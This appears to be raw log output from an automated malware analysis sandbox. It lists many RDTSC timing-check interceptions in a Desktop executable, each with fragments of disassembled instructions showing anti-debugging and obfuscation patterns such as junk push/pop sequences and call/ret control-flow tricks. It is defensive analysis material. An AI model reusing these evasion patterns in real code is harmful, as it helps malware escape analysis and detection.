Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1605793 second address: 16057AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21AFBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d jg 00007F9CD8F21AF6h 0x00000013 pop eax 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16057AD second address: 16057B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16084F6 second address: 16084FB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16084FB second address: 160856E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F9CD8E65988h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov edi, dword ptr [ebp+122D2C60h] 0x0000002a push 00000000h 0x0000002c push 00000000h 0x0000002e push ebx 0x0000002f call 00007F9CD8E65988h 0x00000034 pop ebx 0x00000035 mov dword ptr [esp+04h], ebx 0x00000039 add dword ptr [esp+04h], 0000001Dh 0x00000041 inc ebx 0x00000042 push ebx 0x00000043 ret 0x00000044 pop ebx 0x00000045 ret 0x00000046 mov edi, dword ptr [ebp+122D2A98h] 0x0000004c jns 00007F9CD8E6598Ah 0x00000052 push 00000000h 0x00000054 and ebx, dword ptr [ebp+122D3A4Fh] 0x0000005a xchg eax, esi 0x0000005b push ecx 0x0000005c pushad 0x0000005d pushad 0x0000005e popad 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16086B3 second address: 16086B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160975D second address: 1609779 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9CD8E65998h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1609779 second address: 160977D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160C4B8 second address: 160C4BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160D411 second address: 160D45A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F9CD8F21AF8h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 push 00000000h 0x00000025 sub dword ptr [ebp+122D396Ah], esi 0x0000002b push 00000000h 0x0000002d sub dword ptr [ebp+122D3401h], ebx 0x00000033 xchg eax, esi 0x00000034 jo 00007F9CD8F21B04h 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160D45A second address: 160D45E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1610571 second address: 1610575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16127D0 second address: 161280A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65994h 0x00000007 jnc 00007F9CD8E65999h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jc 00007F9CD8E65990h 0x00000015 push ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 160C78E second address: 160C792 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161068D second address: 1610698 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F9CD8E65986h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1612E2D second address: 1612E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161074A second address: 161074F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1612E31 second address: 1612E35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1612E35 second address: 1612E96 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F9CD8E65988h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 00000019h 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 cld 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push edi 0x0000002c call 00007F9CD8E65988h 0x00000031 pop edi 0x00000032 mov dword ptr [esp+04h], edi 0x00000036 add dword ptr [esp+04h], 00000019h 0x0000003e inc edi 0x0000003f push edi 0x00000040 ret 0x00000041 pop edi 0x00000042 ret 0x00000043 adc bx, 5B3Fh 0x00000048 push eax 0x00000049 push eax 0x0000004a push edx 0x0000004b push eax 0x0000004c push edx 0x0000004d jc 00007F9CD8E65986h 0x00000053 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1612E96 second address: 1612E9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1612E9A second address: 1612EA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1612EA0 second address: 1612EA6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1613E9A second address: 1613F0D instructions: 0x00000000 rdtsc 0x00000002 jne 00007F9CD8E65986h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F9CD8E65988h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007F9CD8E65988h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 jnc 00007F9CD8E6598Ch 0x0000004a push 00000000h 0x0000004c xor edi, dword ptr [ebp+122D2A30h] 0x00000052 xchg eax, esi 0x00000053 push eax 0x00000054 push edx 0x00000055 pushad 0x00000056 push edx 0x00000057 pop edx 0x00000058 jp 00007F9CD8E65986h 0x0000005e popad 0x0000005f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1614073 second address: 1614077 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1614077 second address: 1614109 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F9CD8E65992h 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push ebx 0x00000012 call 00007F9CD8E65988h 0x00000017 pop ebx 0x00000018 mov dword ptr [esp+04h], ebx 0x0000001c add dword ptr [esp+04h], 00000018h 0x00000024 inc ebx 0x00000025 push ebx 0x00000026 ret 0x00000027 pop ebx 0x00000028 ret 0x00000029 push dword ptr fs:[00000000h] 0x00000030 cld 0x00000031 mov dword ptr fs:[00000000h], esp 0x00000038 and bl, FFFFFFC3h 0x0000003b xor bl, 00000015h 0x0000003e mov eax, dword ptr [ebp+122D00CDh] 0x00000044 sbb bl, FFFFFFF4h 0x00000047 push FFFFFFFFh 0x00000049 adc di, B8FCh 0x0000004e nop 0x0000004f jnc 00007F9CD8E65998h 0x00000055 push eax 0x00000056 pushad 0x00000057 pushad 0x00000058 jmp 00007F9CD8E6598Ah 0x0000005d push ecx 0x0000005e pop ecx 0x0000005f popad 0x00000060 push eax 0x00000061 push edx 0x00000062 jnl 00007F9CD8E65986h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1616522 second address: 1616534 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jne 00007F9CD8F21AF6h 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1616534 second address: 1616538 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1616538 second address: 161653C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1614FD0 second address: 1614FD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161D2DB second address: 161D2E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161D2E1 second address: 161D30E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F9CD8E659A0h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161D30E second address: 161D31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8F21AFBh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161D31D second address: 161D335 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E65994h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161D335 second address: 161D34E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B01h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161D34E second address: 161D352 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15BEAD7 second address: 15BEAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 js 00007F9CD8F21AF6h 0x0000000c popad 0x0000000d pop edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15BEAEB second address: 15BEAF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15BEAF1 second address: 15BEB0C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F9CD8F21B03h 0x0000000e jmp 00007F9CD8F21AFDh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 161CE79 second address: 161CE83 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007F9CD8E65986h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16261A0 second address: 16261B4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pushad 0x00000004 popad 0x00000005 pop edx 0x00000006 jnp 00007F9CD8F21B02h 0x0000000c js 00007F9CD8F21AF6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1626773 second address: 1626779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 162690F second address: 162691B instructions: 0x00000000 rdtsc 0x00000002 jp 00007F9CD8F21AF6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1626C20 second address: 1626C24 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1626C24 second address: 1626C32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 jns 00007F9CD8F21AF6h 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1626C32 second address: 1626C37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1626C37 second address: 1626C3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1626C3D second address: 1626C43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1626C43 second address: 1626C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F9CD8F21B09h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f jc 00007F9CD8F21AF6h 0x00000015 pop esi 0x00000016 pushad 0x00000017 jmp 00007F9CD8F21B03h 0x0000001c push edx 0x0000001d pop edx 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16271B9 second address: 16271BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16271BD second address: 16271C7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9CD8F21AF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16271C7 second address: 16271CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 162CE72 second address: 162CE8D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8F21B07h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 162CE8D second address: 162CE97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 162CE97 second address: 162CE9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 162CE9D second address: 162CEBB instructions: 0x00000000 rdtsc 0x00000002 je 00007F9CD8E65994h 0x00000008 jmp 00007F9CD8E6598Ch 0x0000000d push esi 0x0000000e pop esi 0x0000000f jc 00007F9CD8E6598Eh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 162BCBC second address: 162BCE2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 pushad 0x00000006 popad 0x00000007 jnc 00007F9CD8F21AF6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 jmp 00007F9CD8F21AFFh 0x00000016 push eax 0x00000017 push edx 0x00000018 push edx 0x00000019 pop edx 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 162C0EA second address: 162C102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8E65994h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 162C102 second address: 162C106 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 162B7DF second address: 162B7E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 162C5A3 second address: 162C5AF instructions: 0x00000000 rdtsc 0x00000002 ja 00007F9CD8F21AFEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 162C878 second address: 162C8B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F9CD8E65996h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jc 00007F9CD8E65988h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F9CD8E65995h 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 162FB8A second address: 162FB8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 162FB8E second address: 162FB9A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F9CD8E65986h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 162FB9A second address: 162FBDA instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F9CD8F21B07h 0x00000008 jp 00007F9CD8F21AF6h 0x0000000e pop ecx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push edx 0x00000015 pop edx 0x00000016 jo 00007F9CD8F21AF6h 0x0000001c jmp 00007F9CD8F21AFFh 0x00000021 pushad 0x00000022 popad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 162FBDA second address: 162FBF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F9CD8E6598Eh 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b pop eax 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 162FBF6 second address: 162FC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F9CD8F21AF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1633C4C second address: 1633C5E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9CD8E6598Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1639795 second address: 163979B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16381E1 second address: 16381EE instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jp 00007F9CD8E65986h 0x00000009 pop edi 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16384A8 second address: 16384AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16384AC second address: 16384D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F9CD8E65999h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push edi 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16384D1 second address: 16384E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 ja 00007F9CD8F21AFCh 0x0000000b jbe 00007F9CD8F21AF6h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 16384E6 second address: 16384EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1638647 second address: 1638655 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F9CD8F21AF6h 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15E0505 second address: 15E051A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 jne 00007F9CD8E65986h 0x0000000e jnp 00007F9CD8E65986h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15E051A second address: 15E0526 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007F9CD8F21AF6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 1637EE8 second address: 1637EEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 163F1B3 second address: 163F1FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F9CD8F21B03h 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F9CD8F21B05h 0x00000014 jmp 00007F9CD8F21B07h 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 163F1FC second address: 163F213 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F9CD8E65986h 0x00000008 jmp 00007F9CD8E6598Dh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 163E0BB second address: 163E0C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 163E0C4 second address: 163E0C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F9AEA second address: 15F9AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F9AEF second address: 15F9AF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F9AF4 second address: 15F9AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F9AFA second address: 15DFA57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a xor dword ptr [ebp+122D3226h], ebx 0x00000010 lea eax, dword ptr [ebp+1247888Ah] 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F9CD8E65988h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Ah 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 push eax 0x00000031 jmp 00007F9CD8E65994h 0x00000036 mov dword ptr [esp], eax 0x00000039 xor dword ptr [ebp+122D3042h], ebx 0x0000003f call dword ptr [ebp+122D32C0h] 0x00000045 push eax 0x00000046 push edx 0x00000047 jmp 00007F9CD8E65992h 0x0000004c push esi 0x0000004d push eax 0x0000004e pop eax 0x0000004f pushad 0x00000050 popad 0x00000051 pop esi 0x00000052 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F9F81 second address: 15F9F88 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: 15F9F88 second address: 15F9F95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
